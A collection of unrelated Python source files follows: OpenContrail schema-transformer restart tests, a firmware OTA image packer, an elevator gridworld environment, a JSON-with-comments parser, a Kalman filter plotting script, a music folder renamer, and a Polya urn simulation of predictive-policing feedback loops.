vn1_obj = VirtualNetwork('vn1')
ipam_obj = NetworkIpam('ipam1')
self._vnc_lib.network_ipam_create(ipam_obj)
vn1_obj.add_network_ipam(ipam_obj, VnSubnetsType(
[IpamSubnetType(SubnetType("10.0.0.0", 24))]))
self._vnc_lib.virtual_network_create(vn1_obj)
# create vn2
vn2_obj = VirtualNetwork('vn2')
ipam_obj = NetworkIpam('ipam2')
self._vnc_lib.network_ipam_create(ipam_obj)
vn2_obj.add_network_ipam(ipam_obj, VnSubnetsType(
[IpamSubnetType(SubnetType("172.16.17.32", 24))]))
self._vnc_lib.virtual_network_create(vn2_obj)
np = self.create_network_policy(vn1_obj, vn2_obj, ["s1"])
seq = SequenceType(1, 1)
vnp = VirtualNetworkPolicyType(seq)
vn1_obj.clear_pending_updates()
vn2_obj.clear_pending_updates()
vn1_obj.set_network_policy(np, vnp)
vn2_obj.set_network_policy(np, vnp)
self._vnc_lib.virtual_network_update(vn1_obj)
self._vnc_lib.virtual_network_update(vn2_obj)
try:
sc = self.wait_to_get_sc()
sc_ri_name = 'service-'+sc[0]+'-default-domain_default-project_s1'
except Exception, e:
print "failed: unable to fetch to_bgp.service_chain"
self.assertTrue(False)
try:
self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
to_fq_name=[u'default-domain', u'default-project', u'vn1', sc_ri_name], expect_to_find=True)
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name],
to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'], expect_to_find=True)
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
# stop st
self._st_greenlet.kill()
gevent.sleep(5)
vn1_obj.del_network_policy(np)
vn2_obj.del_network_policy(np)
self._vnc_lib.virtual_network_update(vn1_obj)
self._vnc_lib.virtual_network_update(vn2_obj)
try:
self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
except Exception, e:
print "failed : ri refs are still present in routing instance [vn1]... ", test_common.lineno()
self.assertTrue(False)
self.delete_network_policy(np)
self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
try:
self.check_vn_is_deleted(uuid=vn1_obj.uuid)
except Exception, e:
print "failed : vn1 is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
# start st on a free port
self._st_greenlet = gevent.spawn(test_common.launch_schema_transformer,
self._api_server_ip, self._api_server_port)
gevent.sleep(4)
#check if all ri's are deleted
try:
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', sc_ri_name])
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name])
except Exception, e:
print "failed : ri instances are still present in api server ... ", test_common.lineno()
self.assertTrue(False)
#end
# test service chain configuration while st is restarted
def test_st_restart_service_chain(self):
# create vn1
vn1_obj = VirtualNetwork('vn1')
ipam_obj = NetworkIpam('ipam1')
self._vnc_lib.network_ipam_create(ipam_obj)
vn1_obj.add_network_ipam(ipam_obj, VnSubnetsType(
[IpamSubnetType(SubnetType("10.0.0.0", 24))]))
self._vnc_lib.virtual_network_create(vn1_obj)
# create vn2
vn2_obj = VirtualNetwork('vn2')
ipam_obj = NetworkIpam('ipam2')
self._vnc_lib.network_ipam_create(ipam_obj)
vn2_obj.add_network_ipam(ipam_obj, VnSubnetsType([IpamSubnetType(SubnetType("172.16.17.32", 24))]))
self._vnc_lib.virtual_network_create(vn2_obj)
np = self.create_network_policy(vn1_obj, vn2_obj, ["s1"])
seq = SequenceType(1, 1)
vnp = VirtualNetworkPolicyType(seq)
vn1_obj.clear_pending_updates()
vn2_obj.clear_pending_updates()
vn1_obj.set_network_policy(np, vnp)
vn2_obj.set_network_policy(np, vnp)
self._vnc_lib.virtual_network_update(vn1_obj)
self._vnc_lib.virtual_network_update(vn2_obj)
# stop st and wait for sometime
self._st_greenlet.kill()
gevent.sleep(5)
# start st on a free port
self._st_greenlet = gevent.spawn(test_common.launch_schema_transformer,
self._api_server_ip, self._api_server_port)
gevent.sleep(4)
#check service chain state
try:
sc = self.wait_to_get_sc()
sc_ri_name = 'service-'+sc[0]+'-default-domain_default-project_s1'
except Exception, e:
print "failed: unable to fetch to_bgp.service_chain"
self.assertTrue(False)
try:
self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
to_fq_name=[u'default-domain', u'default-project', u'vn1', sc_ri_name], expect_to_find=True)
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
try:
self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name],
to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'], expect_to_find=True)
except NoIdError, e:
print "failed : routing instance state is not correct... ", test_common.lineno()
self.assertTrue(False)
#cleanup
vn1_obj.del_network_policy(np)
vn2_obj.del_network_policy(np)
self._vnc_lib.virtual_network_update(vn1_obj)
self._vnc_lib.virtual_network_update(vn2_obj)
try:
self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
except Exception, e:
print "failed : ri refs are still present in routing instance [vn1]... ", test_common.lineno()
self.assertTrue(False)
self.delete_network_policy(np)
self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
try:
self.check_vn_is_deleted(uuid=vn1_obj.uuid)
except Exception, e:
print "failed : vn1 is still present in api server ... ", test_common.lineno()
self.assertTrue(False)
#check if all ri's are deleted
try:
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', sc_ri_name])
self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name])
except Exception, e:
print "failed : ri instances are still present in api server ... ", test_common.lineno()
self.assertTrue(False)
#end
# end class TestRouteTable
|
#!/usr/bin/python
import string
import sys
import os
import re
import binascii
import struct
import zlib
chksum = 0
FILE_READ_SIZE=512
def write_file(file_name,data):
if file_name is None:
print 'file_name cannot be none\n'
sys.exit(0)
fp = open(file_name,'ab')
if fp:
fp.seek(0,os.SEEK_END)
fp.write(data)
fp.close()
else:
print '%s write fail\n'%(file_name)
def packotabin():
if len(sys.argv) != 5:
print 'Usage: pack_ota_bin.py fw1.bin fw2.bin -o http_ota_fw_v100.bin'
sys.exit(0)
fw_updata1=sys.argv[1]
fw_updata2=sys.argv[2]
destfile=sys.argv[4]
#print 'fw_updata1=%s \n'%(fw_updata1)
#print 'fw_updata2=%s \n'%(fw_updata2)
if os.path.exists(destfile):
cmd='rm ' + destfile
os.system(cmd)
pSrcFd1 = open(fw_updata1, 'rb')
if pSrcFd1 is None:
print '%s cannot be open\n' % fw_updata1
sys.exit(0)
pSrcFd1.seek(0,os.SEEK_END)
fw1_length = pSrcFd1.tell()
pSrcFd1.seek(0,os.SEEK_SET)
pSrcFd2 = open(fw_updata2, 'rb')
if pSrcFd2 is None:
print '%s cannot be open\n' % fw_updata2
sys.exit(0)
#print 'fw1_length=%d \n'%(fw1_length)
pSrcFd2.seek(0,os.SEEK_END)
fw2_length = pSrcFd2.tell()
pSrcFd2.seek(0,os.SEEK_SET)
#print 'fw2_length=%d \n'%(fw2_length)
#file_total_length = fw2_length + fw1_length
paddingfw1_length = 0
paddingfw2_length = 0
if fw1_length % FILE_READ_SIZE:
paddingfw1_length = FILE_READ_SIZE - (fw1_length % FILE_READ_SIZE)
if fw2_length % FILE_READ_SIZE:
paddingfw2_length = FILE_READ_SIZE - (fw2_length % FILE_READ_SIZE)
magic_data0 = 0x5a
magic_data1 = 0x47
version = 4338
fw1_length = fw1_length + paddingfw1_length
fw2_length = fw2_length
reserved=0x0
header = struct.pack('<BBHIIIIII', int(magic_data0), int(magic_data1),int(version), int(reserved), int(reserved), int(reserved), int(reserved), int(fw1_length),int(fw2_length))
write_file(destfile, header)
data_str = ['00']*(FILE_READ_SIZE - 28)
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(destfile, data_bin)
data_bin= pSrcFd1.read(int(fw1_length))
write_file(destfile, data_bin)
if paddingfw1_length:
data_str = ['00']*(int(paddingfw1_length))
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(destfile, data_bin)
data_bin= pSrcFd2.read(int(fw2_length))
write_file(destfile, data_bin)
pSrcFd1.close()
pSrcFd2.close()
if __name__=='__main__':
packotabin()
|
import numpy as np
import sys
import os
#print(os.getcwd())
import random
import copy
from envs.ElevatorENV.gridworld import Grid
class Lift():
def __init__(self,agent_num,height):
self.agent_num = agent_num
self.height = height
obs_dim = height*4+1
self.action_range = [0, 1, 2]
self.grid = []
self.busy_n = {}
def get_game_list(self):
pass
def get_rewards(self):
pass
def step(self, action_n):
obs_n = []
reward_n = []
done_n = [False]*self.agent_num
info_n = {"new_act":[]}
grid1,busy_n,obs_n,true_act_n,reward_n = self.elevator.run_a_step(action_n)
self.grid = grid1
self.busy_n = busy_n
info_n["new_act"] = true_act_n
## change grid
## new action
reward_x = [int(x) for x in reward_n ]
return obs_n, reward_x, done_n, info_n
def trans_obs(self,pos):
shape = self.grid.shape[0]*self.grid.shape[1]
selfpos = np.zeros((self.grid.shape[0],self.grid.shape[1]))
selfpos[pos] = 1
selfpos = np.reshape(selfpos,shape)
grid1 = copy.deepcopy(self.grid)
grid1[pos] = 0
otherpos = np.reshape(grid1,shape)
inputarr = np.hstack((selfpos,otherpos))
return inputarr
def reset(self):
## obser_n
## 只是部分的obs
arr = np.zeros(self.height*2)
num = self.agent_num#self.height-3
inx=random.sample(range(0,self.height*2),num)
arr[inx] = 1
arr = np.reshape(arr,(self.height,2))
self.grid = arr
obs_n = []
namelist = []
k2 = 1
for i in range(self.height):
for j in range(2):
if self.grid[i,j]!=0:
inputarr0 = self.trans_obs((i,j))
if(k2%2==0):
busy = 0
else:
busy = 1
self.busy_n["Ag"+str(k2)] = busy
obs_n.append(np.hstack((inputarr0, np.array([busy]))))
namelist.append("Ag"+str(k2))
k2+=1
### create a grid world
## combine grid and busy
self.elevator = Grid(self.grid,self.busy_n,self.agent_num,namelist)
return obs_n
def terminate(self):
pass
def render(self):
print("ohhhhhhh")
def rule_agent(height,obs):
## obs: self-pos + other-pos + busy
s1 = obs[:height*2]
s2 = obs[height*2:4*height]
busy = obs[-1]
selfpos = s1.reshape((height,2))
otherpos = s2.reshape((height,2))
grid = selfpos+otherpos
#x = self.pos[0]
#y = self.pos[1]
print( " grid ",grid)
pos = np.where(selfpos==1)
x = int(pos[0])
y = int(pos[1])
print(" pos ",x,y)
if busy == 1:
if x==len(grid)-1:
action = 2
return action,None,flag
if (grid[x+1,y]==1 and y == 1):
action = 1
else:
action = 2
else:
if y==0:
action = 1
else:
action = 0
return action
def getPos(state,hei):
busy = state[-1]
mypos = state[:hei*2]
mypos = mypos.reshape((hei,2))
finalpos = np.where(mypos==1)
return busy,finalpos
if __name__ == "__main__":
lift = Lift(4,5)
obs_n = lift.reset()
#print(" obs_n1 ",obs_n)
#print( " ...a... ")
#act = rule_agent(5,obs_n[0])
#print( " ...b... ")
#act1 = rule_agent(5,obs_n[1])
#act = rule_agent(5,obs_n[0])
lift.elevator.printGrid()
obs_n, reward_x, done_n, info_n = lift.step(np.array([0,0,0,0]))
lift.elevator.printGrid()
#act = rule_agent(5,obs_n[0])
#print( " ...d... ")
#act = rule_agent(5,obs_n[1])
#obs_n, reward_x, done_n, info_n = lift.step(np.array([act,act1]))
print("obs_n[0]....",obs_n[0])
for obs in obs_n:
busy,pos = getPos(obs,5)
print("busy...",int(busy),"coordination...", pos[1][0])
print("=====")
|
<reponame>jriddle-linode/splunk-addon-linode<filename>TA-linode/bin/ta_linode/aob_py3/jsoncomment/comments.py<gh_stars>10-100
#!/bin/python
# coding: utf-8
##########################################################################################################################################
# For templating
import re
# The parser
try:
import ujson as json
except ImportError:
import json
# For templating
from jsonspec.pointer import extract, ExtractError
# The wrapper base class
from .wrapper import GenericWrapper
##########################################################################################################################################
# Comments
COMMENT_PREFIX = ("#",";","//")
MULTILINE_START = "/*"
MULTILINE_END = "*/"
# Data strings
LONG_STRING = '"""'
# JSON Pointer template
TEMPLATE_RE = re.compile(r"\{\{(.*?)\}\}")
##########################################################################################################################################
class JsonComment(GenericWrapper):
def __init__(self, wrapped=json):
super().__init__(wrapped)
# Loads a JSON string with comments
# Allows to expand the JSON Pointer templates
def loads(self, jsonsc, *args, template=True, **kwargs):
# Splits the string in lines
lines = jsonsc.splitlines()
# Process the lines to remove commented ones
jsons = self._preprocess(lines)
# Calls the wrapped to parse JSON
self.obj = self.wrapped.loads(jsons, *args, **kwargs)
# If there are templates, subs them
if template:
self._templatesub(self.obj)
return self.obj
# Loads a JSON opened file with comments
def load(self, jsonf, *args, **kwargs):
# Reads a text file as a string
# Process the readed JSON string
return self.loads(jsonf.read(), *args, **kwargs)
# Opens a JSON file with comments
# Allows a default value if loading or parsing fails
def loadf(self, path, *args, default = None, **kwargs):
# Preparing the default
json_obj = default
# Opening file in append+read mode
# Allows creation of empty file if non-existent
with open( path, mode="a+", encoding="UTF-8" ) as jsonf:
try:
# Back to file start
jsonf.seek(0)
# Parse and load the JSON
json_obj = self.load(jsonf, *args, **kwargs)
# If fails, default value is kept
except ValueError:
pass
return json_obj
# Saves a JSON file with indentation
def dumpf(self, json_obj, path, *args, indent=4, escape_forward_slashes=False, **kwargs):
# Opening file in write mode
with open( path, mode="w", encoding="UTF-8" ) as jsonf:
# Dumping the object
# Keyword escape_forward_slashes is only for ujson, standard json raises an exception for unknown keyword
# In that case, the method is called again without it
try:
json.dump(json_obj, jsonf, *args, indent=indent, escape_forward_slashes=escape_forward_slashes, **kwargs)
except TypeError:
json.dump(json_obj, jsonf, *args, indent=indent, **kwargs)
# Reads lines and skips comments
def _preprocess(self, lines):
standard_json = ""
is_multiline = False
keep_trail_space = 0
for line in lines:
# 0 if there is no trailing space
# 1 otherwise
keep_trail_space = int(line.endswith(" "))
# Remove all whitespace on both sides
line = line.strip()
# Skip blank lines
if len(line) == 0:
continue
# Skip single line comments
if line.startswith(COMMENT_PREFIX):
continue
# Mark the start of a multiline comment
# Not skipping, to identify single line comments using multiline comment tokens, like
# /***** Comment *****/
if line.startswith(MULTILINE_START):
is_multiline = True
# Skip a line of multiline comments
if is_multiline:
# Mark the end of a multiline comment
if line.endswith(MULTILINE_END):
is_multiline = False
continue
# Replace the multi line data token to the JSON valid one
if LONG_STRING in line:
line = line.replace(LONG_STRING, '"')
standard_json += line + " " * keep_trail_space
# Removing non-standard trailing commas
standard_json = standard_json.replace(",]", "]")
standard_json = standard_json.replace(",}", "}")
return standard_json
# Walks the json object and subs template strings with pointed value
def _templatesub(self, obj):
# Gets items for iterables
if isinstance(obj, dict):
items = obj.items()
elif isinstance(obj, list):
items = enumerate(obj)
else:
items = None
# Walks the iterable
for key, subobj in items:
# If subobj is another iterable, call this method again
if isinstance(subobj, (dict, list)):
self._templatesub(subobj)
# If is a string:
# - Find all matches to the template
# - For each match, get through JSON Pointer the value, which must be a string
# - Substitute each match to the pointed value, or ""
# - The string with all templates substitued is written back to the parent obj
elif isinstance(subobj, str):
obj[key] = TEMPLATE_RE.sub(self._repl_getvalue, subobj)
# Replacement function
# The match has the JSON Pointer
def _repl_getvalue(self, match):
try:
# Extracts the pointed value from the root object
value = extract(self.obj, match[1])
# If it's not a string, it's not valid
if not isinstance(value, str):
raise ValueError("Not a string: {}".format(value))
except (ExtractError, ValueError) as e:
# Sets value to empty string
value = ""
print(e)
return value
##########################################################################################################################################
|
<reponame>patricknaughton01/RoboticSystemsBook<filename>figures/perception/randomwalk.py<gh_stars>100-1000
import matplotlib.pyplot as plt
import numpy as np
from kalman import *
def kf_trace(F,g,P,H,j,Q,Xmean,Xvar,Z):
if not isinstance(F,np.ndarray): F = np.array([[F]])
if not isinstance(g,np.ndarray): g = np.array([g])
if not isinstance(P,np.ndarray): P = np.array([[P]])
if H is not None:
if not isinstance(H,np.ndarray): H = np.array([[H]])
if not isinstance(j,np.ndarray): j = np.array([j])
if not isinstance(Q,np.ndarray): Q = np.array([[Q]])
if not isinstance(Xmean,np.ndarray): Xmean = np.array([Xmean])
if not isinstance(Xvar,np.ndarray): Xvar = np.array([[Xvar]])
cur_mean,cur_cov = Xmean,Xvar
res_mean = [cur_mean]
res_cov = [cur_cov]
for z in Z:
if not isinstance(z,np.ndarray): z = np.array([z])
cur_mean,cur_cov = kalman_filter_predict(cur_mean,cur_cov,F,g,P)
if H is not None:
cur_mean,cur_cov = kalman_filter_update(cur_mean,cur_cov,F,g,P,H,j,Q,z)
res_mean.append(cur_mean)
res_cov.append(cur_cov)
return res_mean,res_cov
T = 100
N = 20
dt = 0.1
motion_noise_magnitude = 1.0
noise_magnitude = 0.3
fig1 = plt.figure(figsize=(10,4))
ax1 = fig1.add_subplot(1, 2, 1)
ax1.set_xlabel("Time")
ax1.set_ylabel("State")
ax1.set_ylim(-3,3)
ax1.set_xlim(0,10)
x = np.array(range(T))*dt
for i in xrange(N):
eps = np.random.normal(size=T)*motion_noise_magnitude
y = np.cumsum(eps*dt)
ax1.plot(x,y)
y,yvar = kf_trace(F=1,g=0,P=motion_noise_magnitude*dt**2,H=None,j=None,Q=noise_magnitude**2,Xmean=0,Xvar=0,Z=eps)
y = np.array([yi[0] for yi in y])
yvar = np.array([yi[0,0] for yi in yvar])
kf_pred, = ax1.plot(x,y[:-1],label="KF prediction")
ax1.plot(x,y[:-1]+2.0*np.sqrt(yvar)[:-1],label="KF prediction + 2*std",lw=0.5,color='k',linestyle='--')
ax1.plot(x,y[:-1]-2.0*np.sqrt(yvar)[:-1],label="KF prediction + 2*std",lw=0.5,color='k',linestyle='--')
ax1.legend(handles=[kf_pred])
ax2 = fig1.add_subplot(1, 2, 2)
ax2.set_xlabel("Time")
ax2.set_ylabel("State")
ax2.set_ylim(-3,3)
ax2.set_xlim(0,10)
#eps_truth = np.random.normal(size=T)
#y_truth = np.cumsum(eps*dt)
y_truth = np.sin(np.array(range(T))*dt*0.5)*1.0
x = np.array(range(T))*dt
z = y_truth + np.random.normal(size=T)*noise_magnitude
y,yvar = kf_trace(F=1,g=0,P=motion_noise_magnitude*dt**2,H=1,j=0,Q=noise_magnitude**2,Xmean=0,Xvar=0,Z=z)
y = np.array([yi[0] for yi in y])
yvar = np.array([yi[0,0] for yi in yvar])
Zmse = np.sqrt(np.sum((z-y_truth)**2))
KFmse = np.sqrt(np.sum((y[:-1]-y_truth)**2))
print "Z MSE",Zmse
print "KF MSE",KFmse
print "Reduction (%)",(Zmse-KFmse)/Zmse*100
ground_truth, = ax2.plot(x,y_truth,label="Ground truth",color='k')
obs = ax2.scatter(x,z,label="Observations",color='gray',s=9)
kf_estimate, = ax2.plot(x,y[:-1],label="KF estimate")
ax2.plot(x,y[:-1]+2.0*np.sqrt(yvar)[:-1],label="KF estimate + 2*std",lw=0.5,color='k',linestyle='--')
ax2.plot(x,y[:-1]-2.0*np.sqrt(yvar)[:-1],label="KF estimate + 2*std",lw=0.5,color='k',linestyle='--')
ax2.legend(handles=[ground_truth,obs,kf_estimate])
plt.show()
|
<reponame>goofus/smoked-salmon
import os
import re
import shutil
from copy import copy
from string import Formatter
import click
from salmon import config
from salmon.common import strip_template_keys
from salmon.constants import (
BLACKLISTED_CHARS,
BLACKLISTED_FULLWIDTH_REPLACEMENTS,
)
from salmon.errors import UploadError
def rename_folder(path, metadata, check=True):
"""
Create a revised folder name from the new metadata and present it to the
user. Have them decide whether or not to accept the folder name.
Then offer them the ability to edit the folder name in a text editor
before the renaming occurs.
"""
old_base = os.path.basename(path)
new_base = generate_folder_name(metadata)
if check:
click.secho("\nRenaming folder...", fg="cyan", bold=True)
click.echo(f"Old folder name : {old_base}")
click.echo(f"New pending folder name: {new_base}")
if not click.confirm(
click.style(
"\nWould you like to replace the original folder name?",
fg="magenta",
bold=True,
),
default=True,
):
return path
new_base = _edit_folder_interactive(new_base)
new_path = os.path.join(os.path.dirname(path), new_base)
if os.path.isdir(new_path) and old_base != new_base:
if not check or click.confirm(
click.style(
"A folder already exists with the new folder name, would you like to replace it?",
fg="magenta",
bold=True,
),
default=True,
):
shutil.rmtree(new_path)
else:
raise UploadError("New folder name already exists.")
new_path_dirname = os.path.dirname(new_path)
if not os.path.exists(new_path_dirname):
os.makedirs(new_path_dirname)
os.rename(path, new_path)
click.secho(f"Renamed folder to {new_base}.", fg="yellow")
return new_path
def generate_folder_name(metadata):
"""
Fill in the values from the folder template using the metadata, then strip
away the unnecessary keys.
"""
metadata = {**metadata, **{"artists": _compile_artist_str(metadata["artists"])}}
template = config.FOLDER_TEMPLATE
keys = [fn for _, fn, _, _ in Formatter().parse(template) if fn]
for k in keys.copy():
if not metadata.get(k):
template = strip_template_keys(template, k)
keys.remove(k)
sub_metadata = _fix_format(metadata, keys)
return template.format(
**{k: _sub_illegal_characters(sub_metadata[k]) for k in keys}
)
def _compile_artist_str(artist_data):
"""Create a string to represent the main artists of the release."""
artists = [a[0] for a in artist_data if a[1] == "main"]
if len(artists) > config.VARIOUS_ARTIST_THRESHOLD:
return config.VARIOUS_ARTIST_WORD
c = ", " if len(artists) > 2 or "&" in "".join(artists) else " & "
return c.join(sorted(artists))
def _sub_illegal_characters(stri):
if config.FULLWIDTH_REPLACEMENTS:
for char, sub in BLACKLISTED_FULLWIDTH_REPLACEMENTS.items():
stri = str(stri).replace(char, sub)
return re.sub(BLACKLISTED_CHARS, config.BLACKLISTED_SUBSTITUTION, str(stri))
def _fix_format(metadata, keys):
"""
Add abbreviated encoding to format key when the format is not 'FLAC'.
Helpful for 24 bit FLAC and MP3 320/V0 stuff.
So far only 24 bit FLAC is supported, when I fix the script for MP3 i will add MP3 encodings.
"""
sub_metadata = copy(metadata)
if "format" in keys:
if metadata["format"] == "FLAC" and metadata["encoding"] == "24bit Lossless":
sub_metadata["format"] = "24bit FLAC"
elif metadata["format"] == "MP3":
enc = re.sub(r" \(VBR\)", "", metadata["encoding"])
sub_metadata["format"] = f"MP3 {enc}"
if metadata["encoding_vbr"]:
sub_metadata["format"] += " (VBR)"
elif metadata["format"] == "AAC":
enc = re.sub(r" \(VBR\)", "", metadata["encoding"])
sub_metadata["format"] = f"AAC {enc}"
if metadata["encoding_vbr"]:
sub_metadata["format"] += " (VBR)"
return sub_metadata
def _edit_folder_interactive(foldername):
"""Allow the user to edit the pending folder name in a text editor."""
if not click.confirm(
click.style(
"Is the new folder name acceptable? ([n] to edit)", fg="magenta", bold=True
),
default=True,
):
newname = click.edit(foldername)
while True:
if newname is None:
return foldername
elif re.search(BLACKLISTED_CHARS, newname):
if not click.confirm(
click.style(
"Folder name contains invalid characters, retry?",
fg="magenta",
bold=True,
),
default=True,
):
exit()
else:
return newname.strip().replace("\n", "")
newname = click.edit(foldername)
return foldername
|
<reponame>algofairness/runaway-feedback-loops-src
#!/usr/bin/env python3
import math
import pylab
import sys
import click
from polya import *
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
def histogram(urn, ndraws, nrunsm, lambdaa, lambdab):
x = []
for i in range(nruns):
urn.reset()
for _ in urn.draw(ndraws): pass
x.append(urn.state[0] / (urn.state[0] + urn.state[1]))
if i % 100 == 0:
print(".", file=sys.stderr, end='')
sys.stderr.flush()
print("", file=sys.stderr)
pylab.hist(x)
def singlerun(urn, ndraws, nrunsm, lambdaa, lambdab):
x = []
y = []
for state in urn.draw(ndraws):
x.append(state[0])
y.append(state[1])
pylab.plot(x, 'r')
pylab.plot(y, 'k')
pylab.plot(list(a + b for a,b in zip(x,y)), 'b--')
def singleprob(urn, ndraws, nrunsm, lambdaa, lambdab):
x = []
y = []
s = 0
c = 0
for state in urn.draw(ndraws):
x.append(state[0])
y.append(state[1])
s += (x[-1] / (x[-1]+y[-1]))
c += 1
pylab.plot(list((a / (a + b)) for (a,b) in zip(x, y)), 'r')
print(s/c)
print(urn.state)
def probplot(urn, ndraws, nruns, lambdaa, lambdab):
burn_in = 0
histo_resolution = 100
counts = numpy.zeros((histo_resolution+1, ndraws-burn_in))
for i in range(nruns):
urn.reset()
for _ in urn.draw(burn_in): pass
for j, state in enumerate(urn.draw(ndraws-burn_in)):
u = state[0] / (state[0] + state[1])
counts[100-int(u*histo_resolution), j] += 1
if i % 100 == 0:
print(".", file=sys.stderr, end='')
sys.stderr.flush()
v = (counts * numpy.linspace(1, 0, 101)[:,numpy.newaxis]).sum(axis=0) / counts.sum(axis=0)
counts_max = counts.max(axis=0)
counts = counts / counts_max
pylab.imshow(counts, extent=[0, counts.shape[1],
0, 1.01],
aspect=ndraws, cmap=pylab.cm.gray_r)
((a, b), (c, d)) = urn.update_matrix
result = numpy.roots([c+d-a-b, a - 2 * c - d, c])
for r in result:
if r >= 0 and r <= 1:
pylab.plot([0, counts.shape[1]], [r, r], 'r--')
# pylab.plot([0, counts.shape[1]], [(a + b) / (a + b + c + d),
# (a + b) / (a + b + c + d)], 'g--')
pylab.plot([0, counts.shape[1]], [ lambdaa / (lambdab + lambdaa), lambdaa / (lambdab + lambdaa)], 'g--')
pylab.plot(numpy.arange(counts.shape[1]), v, 'y-')
pylab.xlim([0, counts.shape[1]])
pylab.ylim([1, 0])
print(result)
pylab.colorbar()
commands = {
"singlerun": singlerun,
"histogram": histogram,
"probplot": probplot,
"singleprob": singleprob
}
urn_class = PolyaUrn
def exponential_decay_option(click, param, exponential_decay):
global urn_class
if exponential_decay == 0.0:
return
print("Setting exponential decay to %f" % exponential_decay)
urn_class = add_exponential_decay(urn_class, exponential_decay)
def linear_surprise_option(click, param, linear_surprise):
global urn_class
if not linear_surprise:
return
print("Setting urn to behave with linear surprise")
urn_class = add_linear_surprise(urn_class)
def partial_surprise_option(click, param, partial_surprise):
global urn_class
if partial_surprise == (None, None):
return
print("Setting urn to behave with partial surprise")
urn_class = add_partial_surprise(urn_class, partial_surprise)
def weighted_surprise_option(click, param, weighted_surprise):
global urn_class
if weighted_surprise == (None, None, None, None):
return
print("Setting urn to behave with weighted surprise")
urn_class = add_weighted_surprise(urn_class, weighted_surprise)
def sqrt_surprise_option(click, param, sqrt_surprise):
global urn_class
if not sqrt_surprise:
return
print("Setting urn to behave with sqrt surprise")
urn_class = add_sqrt_surprise(urn_class)
def poisson_option(click, param, poisson):
global urn_class
if not poisson:
return
print("Setting urn to be Poisson")
urn_class = add_poisson_update(urn_class)
def truncation_option(click, param, truncation):
global urn_class
if truncation is None:
return
print("Truncating urn update to %d" % truncation)
urn_class = add_truncation(urn_class, truncation)
urn_params = [[1.0,0.0],[0.0,1.0]]
def mixed_option(click, param, mixed):
if mixed == (None, None, None, None):
return
(d_a, d_b, r_a, r_b) = mixed
urn_params[0][0] = d_a + r_a
urn_params[0][1] = r_b
urn_params[1][0] = r_a
urn_params[1][1] = d_b + r_b
def set_a(click, param, a):
if a is None: return
urn_params[0][0] = a
def set_b(click, param, b):
if b is None: return
urn_params[0][1] = b
def set_c(click, param, c):
if c is None: return
urn_params[1][0] = c
def set_d(click, param, d):
if d is None: return
urn_params[1][1] = d
command_docstring = """Commands:
- singlerun
- histogram
- probplot
- singleprob
"""
@click.command()
@click.option('--a', callback=set_a, type=float, help="Set the urn's a parameter")
@click.option('--b', callback=set_b, type=float, help="Set the urn's b parameter")
@click.option('--c', callback=set_c, type=float, help="Set the urn's c parameter")
@click.option('--d', callback=set_d, type=float, help="Set the urn's d parameter")
@click.option('--command', default="singlerun", help=command_docstring)
@click.option('--ndraws', type=int, default=2000, help="How many draws from an urn")
@click.option('--nruns', type=int, default=1000, help="How many urn runs to run")
@click.option('--nr', type=float, default=1, help="Number of red balls in urn's starting configuration")
@click.option('--nb', type=float, default=1, help="Number of black balls in urn's starting configuration")
@click.option('--lambdaa', type=float, default=0.5, help="Underlying true rate for neighborhood A (red balls)")
@click.option('--lambdab', type=float, default=0.5, help="Underlying true rate for neighborhood B (black balls)")
@click.option('--exponential_decay', callback=exponential_decay_option, type=float, default=0, help="Add exponential decay to the urn")
@click.option('--truncation', callback=truncation_option, type=int, help="Truncate the maximum number of new balls to add to urn")
@click.option('--linear_surprise', callback=linear_surprise_option, is_flag=True, help="Incorporate a linear surprise factor in urn update")
@click.option('--partial_surprise', callback=partial_surprise_option, nargs=2, type=(float, float), default=(None, None), help="Incorporate a partial surprise factor in urn update, adding only reported crimes")
@click.option('--weighted_surprise', callback=weighted_surprise_option, nargs=4, type=(float, float, float, float), default=(None, None, None, None), help="Incorporate a weighted surprise factor in urn update, adding only reported crimes")
@click.option('--sqrt_surprise', callback=sqrt_surprise_option, is_flag=True, help="Incorporate a sqrt surprise factor in urn update")
@click.option('--poisson', callback=poisson_option, is_flag=True, help="urn updates are draws from a poisson instead of deterministic")
@click.option('--mixed', callback=mixed_option, nargs=4, type=(float, float, float, float), default=(None, None, None, None), help="set parameters of a mixed urn d_A, d_B, r_B, r_B")
@click.option('--interactive', is_flag=True, help='if set, show image interactively instead of saving to file')
@click.option('--output', type=str, default="fig_out.png", help='name of output file if noninteractive')
